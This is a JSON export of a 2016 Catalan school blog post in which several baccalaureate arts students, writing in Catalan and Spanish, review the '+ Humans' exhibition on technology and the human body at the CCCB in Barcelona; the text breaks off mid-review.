{"id":1260,"date":"2016-03-10T14:30:44","date_gmt":"2016-03-10T13:30:44","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=1260"},"modified":"2018-05-06T07:17:23","modified_gmt":"2018-05-06T05:17:23","slug":"en-el-futur-serem-humans","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/en-el-futur-serem-humans\/","title":{"rendered":"En el futur serem + humans?"},"content":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx.\u00a0Art\u00edstic ]<\/p>\n<p>L&#8217;alumnat de l&#8217;art\u00edstic ha tingut l&#8217;enc\u00e0rrec de visitar pel seu propi compte l&#8217;exposici\u00f3 <a href=\"http:\/\/www.cccb.org\/ca\/exposicions\/fitxa\/-humans\/129032\" target=\"_blank\">+ Humans<\/a>, al Centre de Cultura Contempor\u00e0nia de Barcelona, i donar la\u00a0seva opini\u00f3 per conv\u00e8nce&#8217;ns, o no, de\u00a0visitar-la, tenim de temps fins el 10 d&#8217;abril del 2016.<\/p>\n<p>Aquesta exposici\u00f3 continua la visi\u00f3 sobre el futur de l&#8217;esp\u00e8cia\u00a0que es va iniciar l&#8217;any passat amb <a href=\"http:\/\/bigbangdata.cccb.org\/\" target=\"_blank\">Big Bang Data<\/a>, on es pretenia reflexionar sobre el control de les dades i el valor d&#8217;aquestes.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/en-el-futur-serem-humans\/attachment\/032b4619-c756-49e4-a36a-c2252d8b5f5a\/\" rel=\"attachment wp-att-1333\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1333\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/032b4619-c756-49e4-a36a-c2252d8b5f5a-300x180.jpe\" alt=\"032b4619-c756-49e4-a36a-c2252d8b5f5a\" width=\"250\" height=\"150\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/032b4619-c756-49e4-a36a-c2252d8b5f5a-300x180.jpe 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/032b4619-c756-49e4-a36a-c2252d8b5f5a-1024x614.jpe 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/032b4619-c756-49e4-a36a-c2252d8b5f5a.jpe 1600w\" sizes=\"auto, (max-width: 250px) 100vw, 250px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/en-el-futur-serem-humans\/attachment\/87730c6b-e7d8-40de-bc23-4cb39b79a601\/\" rel=\"attachment wp-att-1334\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1334\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/87730c6b-e7d8-40de-bc23-4cb39b79a601-300x200.jpe\" alt=\"87730c6b-e7d8-40de-bc23-4cb39b79a601\" width=\"225\" height=\"150\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/87730c6b-e7d8-40de-bc23-4cb39b79a601-300x200.jpe 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/87730c6b-e7d8-40de-bc23-4cb39b79a601-1024x683.jpe 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/87730c6b-e7d8-40de-bc23-4cb39b79a601.jpe 1296w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/en-el-futur-serem-humans\/attachment\/20160109_125530\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1276\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/20160109_125530-300x151.jpg\" alt=\"20160109_125530\" width=\"299\" height=\"150\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/20160109_125530-300x151.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/20160109_125530.jpg 1000w\" sizes=\"auto, (max-width: 299px) 100vw, 299px\" \/><\/a><\/p>\n<p>Sofia Garc\u00eda<\/p>\n<blockquote><p><span style=\"font-weight: 400;\">La exposici\u00f3n de +HUMANS me ha resultado muy interesante no tanto como me esperaba, pero la verdad que la recomendar\u00eda. Porque nos ense\u00f1a una especie de visi\u00f3n exagerada de c\u00f3mo ser\u00eda nuestro futuro si continuamos con algunos de nuestros gustos tan extravagantes, tanto en nuestros cuerpos o en nuestro entorno. Tambi\u00e9n vemos en la secci\u00f3n de transformaciones faciales que se realizaban a los reci\u00e9n nacidos para que en su futuro tuviesen un nivel de salud excelente. La ideolog\u00eda que se tiene en la actualidad sobre el cuerpo perfecto y c\u00f3mo nos dejamos influenciar sobre ello y nos vemos defectos donde no los han y para solucionar esos problemas imaginarios caemos en la tentaci\u00f3n de pasar por un cirujano y <\/span><i><span style=\"font-weight: 400;\">corregir<\/span><\/i><span style=\"font-weight: 400;\"> esos errores para ser felices.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">El primer espacio que nos encontramos en la exposici\u00f3n es el de las pr\u00f3tesis. Seg\u00fan mi punto de vista fue de los que me caus\u00f3 m\u00e1s inter\u00e9s, tanto por su nivel educativo, como informativo. Ver a esa gente que pierde una de sus extremidades y contin\u00faan su vida a\u00fan m\u00e1s fuertes, \u00e9s una de las <\/span><i><span style=\"font-weight: 400;\">cosas<\/span><\/i><span style=\"font-weight: 400;\"> que me alegran mucho e idolatro para ser sincera. Los proyectos de pr\u00f3tesis <\/span><i><span style=\"font-weight: 400;\">lowcost<\/span><\/i><span style=\"font-weight: 400;\"> que se crean para poder ayudar a las personas que no se pueden permitir una pr\u00f3tesis de calidad\u2026 me pareci\u00f3 una de las mejores ideas que se han podido crear y ojal\u00e1 se pudiera extender por todo el mundo.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">La siguiente pieza que me caus\u00f3 m\u00e1s inter\u00e9s fue los autorretratos creados por Bryan Lewis Saunders bajo el efecto de diferentes tipos de drogas. Es incre\u00edble ver c\u00f3mo las drogas pueden llegar a causar tales efectos, sorprendi\u00e9ndome a\u00fan m\u00e1s, cuando vi las 50 maneras totalmente distintas de autoretratarse, as\u00ed c\u00f3mo las diferentes t\u00e9cnicas utilizadas en cada obra.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">En resumen, creo que en toda la exposici\u00f3n se pueden encontrar locas e incre\u00edbles creaciones que el hombre construye respecto a su cuerpo y salud, para hacerlo a\u00fan m\u00e1s suyo. Y no solo se ve en los cuerpos humanos tambi\u00e9n en un entorno incierto, pero posiblemente el futuro que nos explican con cunas que se balacear\u00e1n solas por un brazo mec\u00e1nico, clones que nos sustituir\u00e1n, mantener relaciones sexuales con un ordenador\u2026 En el fondo, el hombre se est\u00e1 preparando para encontrar un sustituto, a cualquier p\u00e9rdida que se le venga encima.<\/span><\/p><\/blockquote>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/en-el-futur-serem-humans\/attachment\/15-1-aimee-mullins-005-1024x557\/\" rel=\"attachment wp-att-1264\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1264\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/15.1-Aimee-Mullins-005-1024x557-300x163.jpg\" alt=\"15.1-Aimee-Mullins-005-1024x557\" width=\"400\" height=\"218\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/15.1-Aimee-Mullins-005-1024x557-300x163.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/15.1-Aimee-Mullins-005-1024x557.jpg 1024w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a>\u00a0\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/en-el-futur-serem-humans\/attachment\/1444298094_455188_1444298232_noticia_normal\/\" rel=\"attachment wp-att-1265\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1265\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/1444298094_455188_1444298232_noticia_normal-300x163.jpg\" alt=\"1444298094_455188_1444298232_noticia_normal\" width=\"400\" height=\"218\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/1444298094_455188_1444298232_noticia_normal-300x163.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/1444298094_455188_1444298232_noticia_normal.jpg 770w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p>Jaume V. Mir\u00f3.<\/p>\n<blockquote><p>Hoy, finalmente, mi amigo David y yo nos hemos decidido a visitar la exposici\u00f3n de <em>+ HUMANS<\/em> en el CCBB, cerca del Museo de Arte Contemporaneo de la ciudad.\u00a0Al ver la publicidad de la exposicion a los dos nos ha -incluso- apetecido entrar a verla, pero la verdad es que, una vez dentro, tanto a \u00e9l como a mi nos a decepcionado bastante. En general no me ha gustado demasiado pero a continuaci\u00f3n describir\u00e9\u00a0las obras que mas\u00a0me han agradado y por qu\u00e9\u00a0me han interesado.<\/p>\n<p>La primera ha sido al principio, junto en\u00a0la entrada, hab\u00eda un par de\u00a0pr\u00f3tesis para piernas de una artista que me gusta mucho. <a href=\"http:\/\/www.viktoriamodesta.com\/about\/\" target=\"_blank\">Viktoria <\/a><a href=\"http:\/\/www.viktoriamodesta.com\/about\/\" target=\"_blank\">Modesta<\/a>, surgi\u00f3 hace un par de a\u00f1os c\u00f3mo cantante Pop aprovechando su discapacidad (tiene una pierna amputada) para decorar un poco m\u00e1s su cuerpo a\u00f1adiendo abalorios y brillos a su extremidad ortop\u00e9dica. <a href=\"https:\/\/www.youtube.com\/watch?v=jA8inmHhx8c\" target=\"_blank\">Aqu\u00ed tienes<\/a>\u00a0su videoclip <em>Prototype<\/em>.<\/p>\n<p>La segunda pieza que me ha parecido interesante ha sido una tumba que, al morir procesa tus fluidos corporales para convertilos en energ\u00eda e introducirlos en una pila para su posterior uso corriente as\u00ed que, despu\u00e9s de la muerta hay algo y adem\u00e1s algo \u00fatil, energ\u00eda para los vivos.<\/p>\n<p>Para terminar me ha gustado y a la vez me ha parecido macabra la idea de una monta\u00f1a rusa ideada para practicar la eutanasia. Esta, produce emociones tan fuertes que el cuerpo humano no puede aguantar.\u00a0<span style=\"font-family: inherit; font-size: 1em; line-height: 1.6;\"><em>Muerte asegurada<\/em> por paro card\u00edaco antes de que la atracci\u00f3n cese.\u00a0<\/span>Las dem\u00e1s obras de la exposici\u00f3n no me han parecido aburridas pero bastante irrelevantes para mi, por lo general pero, ha sido una exposici\u00f3n bastante innovadora e interactiva en comparaci\u00f3n con\u00a0otras visitadas durante el curso.<\/p><\/blockquote>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/en-el-futur-serem-humans\/attachment\/img_20151113_165358\/\" rel=\"attachment wp-att-1269\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1269\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG_20151113_165358-300x169.jpg\" alt=\"IMG_20151113_165358\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG_20151113_165358-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG_20151113_165358.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/en-el-futur-serem-humans\/attachment\/img_20160120_142420\/\" rel=\"attachment wp-att-1270\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1270\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG_20160120_142420-300x169.jpg\" alt=\"IMG_20160120_142420\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG_20160120_142420-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG_20160120_142420.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/en-el-futur-serem-humans\/attachment\/img_20160120_142629\/\" rel=\"attachment wp-att-1271\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1271\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG_20160120_142629-300x169.jpg\" alt=\"IMG_20160120_142629\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG_20160120_142629-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG_20160120_142629.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Joana Dem\u00e0s<\/p>\n<blockquote><p>L\u2019exposici\u00f3 <em>+ HUMANS<\/em> tracta sobre l\u2019evoluci\u00f3 de l\u2019\u00e9sser hum\u00e0 conjuntament amb les noves tecnologies.<br \/>\nSegons el meu parer, destacar\u00e9 tres projectes interessants i xocants. El primer de tots \u00e9s un v\u00eddeo d\u2019un home que, per deixar pres\u00e8ncia de la seva exist\u00e8ncia decideix construir una muntanya russa. Aquesta muntanya constava de quatre espirals m\u00e9s una <em>muntanya<\/em> d\u2019uns 523 metres d\u2019al\u00e7ada aproxim\u00e0dament. \u00c9s tant alta i es va a tanta velocitat que en el desc\u00e8ns es provoca la mort dels seus ocupants, a causa de falta d\u2019oxigen. Em va impressionar la for\u00e7a que desprenien els seus ulls, com si estigu\u00e9s molt decidit pel seu projecte. Jo mai em pujaria en una muntanya rusa tan gran, i molt menys al saber qu\u00e8 se sent.<\/p>\n<p>El segon \u00e9s un experiment que el p\u00fablic de l\u2019exposici\u00f3 pot realitzar. Consisteix en posar-se un gorro ple de cables electromagn\u00e8tics i un altre cable al canell. Aix\u00ed detecten si en aquell moment et sents concentrat, actiu o desconcentrat. Segons l\u2019estat en el que estiguis, sonar\u00e0 una can\u00e7\u00f3 diferent. Aquest invent s\u2019ha realitzat perqu\u00e8 es puguin expressar les persones amb minusvalies i aix\u00ed poder-se fer entendre millor.<\/p>\n<p>Finalment, i el que m\u00e9s em va impactar, son les deformacions dermatol\u00f2giques cir\u00fargicament que se\u2019ls hi far\u00e0 als nadons d\u2019aqu\u00ed uns anys. Com per exemple l\u2019extirpaci\u00f3 del dit mitj\u00e0, per amainar l\u2019asma, en cas de que el nen neixi amb ella. O la modificaci\u00f3 d\u2019un esf\u00ednter a la part inferior del cap, a prop de l\u2019orella, per tal que quan la criatura ingereixi masses medicaments, hi haur\u00e0 un lloc per extreurel\u2019s m\u00e9s c\u00f2modament. O l\u2019estirament de la pell del cap, creant plecs per a una major ventilaci\u00f3 del cervell i ja d\u2019adult podr\u00e0 treballar a altes temperatures exteriors.<\/p>\n<p>Tot plegat, em va semblar bastant esgarrif\u00f3s, per\u00f2 en el fons l\u2019exposici\u00f3 et fa plantejar-te molts aspectes vers la nostra evoluci\u00f3 de l\u2019esp\u00e8cie.<\/p><\/blockquote>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/en-el-futur-serem-humans\/attachment\/img_20160120_142715\/\" rel=\"attachment wp-att-1272\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1272\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG_20160120_142715-300x169.jpg\" alt=\"IMG_20160120_142715\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG_20160120_142715-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG_20160120_142715.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/en-el-futur-serem-humans\/attachment\/img_20160120_143158\/\" rel=\"attachment wp-att-1273\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1273\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG_20160120_143158-300x169.jpg\" alt=\"IMG_20160120_143158\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG_20160120_143158-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/IMG_20160120_143158.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/en-el-futur-serem-humans\/attachment\/veronica-humans\/\" rel=\"attachment wp-att-1274\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1274\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Ver\u00f3nica-humans-300x168.jpg\" alt=\"Ver\u00f3nica + humans\" width=\"300\" height=\"168\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Ver\u00f3nica-humans-300x168.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/Ver\u00f3nica-humans.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Cristina Callado<\/p>\n<blockquote><p><span style=\"font-weight: 400;\">L\u2019exposici\u00f3 em va semblar molt interessant, em va fer pensar si el futur seria com el de les pel\u00b7l\u00edcules. <\/span><\/p>\n<p><span style=\"font-weight: 400;\">En conjunt, les obres eren genials, unes destacaven m\u00e9s que d\u2019altres per\u00f2 en vaig sortir molt contenta. Hi van haver un parell d\u2019obres que em van cridar molt l\u2019atenci\u00f3, una de les primeres que son les pr\u00f2tesis de cames i bra\u00e7os decorades, en s\u00ed la pe\u00e7a no \u00e9s tanta cosa, per\u00f2 el que em va agradar va ser el seu significat, si has perdut una part del teu cos no ho has d\u2019amagar, simplement has d\u2019ensenyar-ho, cal estar orgullosa d\u2019aquesta nova part del teu cos.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Tamb\u00e9 vaig veure un v\u00eddeo de persones amb malformacions que havien fet un calendari en el qual es mostraven sense roba, per demostrar que ells tamb\u00e9 estan orgullosos del seu aspecte. Ells tamb\u00e9 poden ser estimats i estimar.<\/span><\/p><\/blockquote>\n<p>\u00c0lex Canela<\/p>\n<blockquote><p><span style=\"font-weight: 400;\">L&#8217;exposici\u00f3 mostra diferents instal\u00b7lacions on s&#8217;explora la interacci\u00f3 del m\u00f3n cibern\u00e8tic amb els cos hum\u00e0, tant actualment com en el futur. \u00c9s una exposici\u00f3 multidisciplinar on podem trobar una barreja d&#8217;obres d&#8217;art, aparells hist\u00f2rics, robots i prototips, recerca cient\u00edfica, marques comercials, etc.\u00a0<\/span><span style=\"font-weight: 400;\">Es divideix en quatre espais: Capacitats augmentades<\/span><b>, <\/b><span style=\"font-weight: 400;\">Trobar-se amb d\u2019altres<\/span><b>, <\/b><span style=\"font-weight: 400;\">Dissenyant l\u2019entorn<\/span> <span style=\"font-weight: 400;\">i<\/span> <span style=\"font-weight: 400;\">La vida en els l\u00edmits. <\/span><\/p>\n<p>Podem destacar diferents obres com els aven\u00e7os que han presentat les pr\u00f2tesis, des de les primeres fetes de fusta fins a les dissenyades amb impressores 3-D; el disseny de la ciutat de Hong Kong un cop extingida la humanitat; una muntanya russa que provoca la mort de 84 persones a causa de l&#8217;exc\u00e9s de gravetat o els autoretrats sota els efectes de diferents drogues.<\/p>\n<p><span style=\"font-weight: 400;\">L&#8217;exposici\u00f3 pret\u00e9n que reflexionem sobre els l\u00edmits i les possibilitats de la tecnologia sobre el desenvolupament d&#8217;humans. Jo crec que<\/span><span style=\"font-weight: 400;\">\u00a0alguns apartats ratllen all\u00f2 desagradable i d&#8217;altres, sorprenen per les opcions que presenten, per\u00f2, en general, \u00e9s una exposici\u00f3 for\u00e7a recomanable.<\/span><\/p><\/blockquote>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/en-el-futur-serem-humans\/attachment\/5\/\" rel=\"attachment wp-att-1322\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1322\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/5-300x225.jpg\" alt=\"5\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/5-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/5-1024x768.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/5-200x150.jpg 200w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/en-el-futur-serem-humans\/attachment\/3\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1320 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/3-300x225.jpg\" alt=\"3\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/3-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/3-1024x768.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/3-200x150.jpg 200w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/en-el-futur-serem-humans\/attachment\/4\/\" rel=\"attachment wp-att-1321\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1321\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/4-300x225.jpg\" alt=\"4\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/4-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/4-1024x768.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/4-200x150.jpg 200w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Valeria Marca<\/p>\n<blockquote><p>Aquestes festes de Nadal vaig anar al Centre Cultural Contempor\u00e0nia de Barcelona, a veure l\u2019exposici\u00f3 + Humans, que estar\u00e0 fins el 10 d\u2019Abril.\u00a0\u00c9s veritat que a vegades, nom\u00e9s de pensar en una exposici\u00f3, ens fa una mica de mandra, per\u00f2 ja a l\u2019entrar em va entusiasmar. Sota aquell t\u00edtol tant gran de \u2018\u2019+ Humans\u2019\u2019 i el canvi de fons sobre les lletres, juntament amb el so, va ser inpressionant.<\/p>\n<p>De les coses que m\u00e9s em va sorprendre va ser la figura de Neil Harbisson i Moon Ribas, els cyborgs. Ja sabia de la seva exist\u00e8ncia i dels aparells que tenen per a detectar els colors amb el so com en Neil, o de les petites ones s\u00edsmiques amb una polsera en el bra\u00e7. Hi havia figures recreades amb els mateixos s\u00edmptomes, \u00e9s incre\u00efble! \u00a0En aquell apartat tamb\u00e9 hi havia quelcom una mica estrany, per m\u00ed, com per exemple: implantant d\u2019orella dins d\u2019un bra\u00e7 -estrany per\u00f2 emocionant.<\/p>\n<p>En conclusi\u00f3, recomanaria a la gent anar-hi, sigui de l\u2019edat que sigui, ja que tracta del futur. Alhora de la veritat, l\u2019exposici\u00f3 va estar bastant b\u00e9, entretinguda i amb varietats d\u2019exemples que podr\u00edem veure d\u2019aqu\u00ed prop, ja que totes les \u2018\u2019figures\u2019\u2019 tenen un tema en com\u00fa, el futur.<\/p><\/blockquote>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/en-el-futur-serem-humans\/attachment\/2\/\" rel=\"attachment wp-att-1319\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1319\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/2-300x225.jpg\" alt=\"2\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/2-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/2-1024x768.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/2-200x150.jpg 200w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/en-el-futur-serem-humans\/attachment\/1\/\" rel=\"attachment wp-att-1318\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1318\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/1-300x225.jpg\" alt=\"1\" width=\"300\" height=\"225\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/1-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/1-1024x768.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/03\/1-200x150.jpg 200w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Kim Romero<\/p>\n<blockquote><p><span style=\"font-weight: 400;\">El passat dimecres 20 de gener uns companys de classe i jo vam anar a l\u2019espectacular exposici\u00f3 de +HUMANS al CCCB.\u00a0<\/span><span style=\"font-weight: 400;\">Hi ha tantes coses que m&#8217;han agradat, que no s\u00e9 ni per on comen\u00e7ar, tota la informaci\u00f3 i les maquetes que es mostren est\u00e0 molt b\u00e9 i s\u00f3n molt completes, a m\u00e9s, una de les coses bones \u00e9s que pots participar en alguns dels projectes exposats.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Un altre apartat es centra m\u00e9s en el cos en general, on actualment hi ha gent que es dedica a ornamentar les parts del cos que els hi falten. Tamb\u00e9 cal destacar els &#8220;experiments&#8221; dels beb\u00e9s amb m\u00e8todes estranys perqu\u00e8 el nad\u00f3 creixi d&#8217;una manera o d\u2019una altre, em van sorprendre molt, fins on avan\u00e7a la ci\u00e8ncia? <\/span><\/p>\n<p><span style=\"font-weight: 400;\">Per altre banda i gr\u00e0cies a l\u2019ADN, podries arribar a saber si una altre persona \u00e9s competen amb tu, o fins i tot, que podr\u00edem arribar a polinitzar-nos en el cas de que s&#8217;extingeixin les abelles.\u00a0<\/span>Vull destacar les preguntes i frases que es plantegen al llarg de l\u2019exposici\u00f3, ja que et fan pensar i reflexionar, com per exemple: \u201cLa gente no mira lo que te falta si no lo lleva\u201d. Hi ha moltes coses interessant, i tornaria a pagar per una exposici\u00f3 aix\u00ed.<\/p><\/blockquote>\n<p>No\u00e9lia Soler<\/p>\n<blockquote><p><span style=\"font-weight: 400;\">Des de la meva perspectiva <\/span><i><span style=\"font-weight: 400;\">+Humans<\/span><\/i><span style=\"font-weight: 400;\"> ha sigut una exposici\u00f3 impressionant. Tant les coses que estan en proc\u00e9s o aquelles que ja funcionen en altres pa\u00efsos son incre\u00efbles. Personalment no pensava que m&#8217;agrad\u00e9s, ja que dubtava de si hi hauria infinites obres o molta informaci\u00f3 que no entengu\u00e9s, per\u00f2 ha estat tot el contrari. <\/span><\/p>\n<p>Alguns projectes m\u2019han semblat molt interessants, per\u00f2 d\u2019altres no, com l\u2019utilitat de tenir l\u2019ADN de les persones, per tal d\u2019aconseguir una parella\u2026, aix\u00f2 em sembla rid\u00edcul, igual que fabricar una bateria per quan t\u2019hagis mort,que despr\u00e9s d\u2019aquesta puguis viure uns anys, o \u00a0un aparell que et provoca orgasmes.<\/p>\n<p><span style=\"font-weight: 400;\">La tecnologia i l\u2019avan\u00e7ament de les coses per fer un intent de millorar el m\u00f3n est\u00e0 b\u00e9, per\u00f2 fins a un l\u00edmit. Hi ha projectes que s\u00f3n innecessaris a la nostra vida i d\u2019altres que per moltes coses que inventis aquella situaci\u00f3 acabar\u00e0 